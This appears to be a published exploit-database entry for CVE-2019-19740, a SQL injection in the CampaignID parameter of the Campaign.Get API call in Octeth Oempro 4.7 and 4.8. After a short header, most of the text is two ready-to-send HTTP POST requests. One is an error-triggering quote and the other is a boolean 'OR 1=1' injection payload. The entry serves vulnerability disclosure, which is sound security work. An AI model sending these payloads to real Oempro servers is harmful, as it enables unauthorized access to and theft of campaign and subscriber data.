Share
# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection  
# Date: 2020-01-27  
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)  
# Vendor Homepage: www2.octeth.com  
# Version: Octeth Oempro v.4.7 and v.4.8  
# Tested on: Oempro v.4.7  
# CVE : CVE-2019-19740  
  
  
An authenticated user can easily exploit this vulnerability. Octeth Oempro  
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get  
is vulnerable.  
  
# Error condition  
POST /api.php HTTP/1.1  
Host: 127.0.0.1  
  
command=Campaign.Get&CampaignID=2019'&responseformat=JSON  
  
# SQL Injection exploitation  
POST /api.php HTTP/1.1  
Host: 127.0.0.1  
  
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON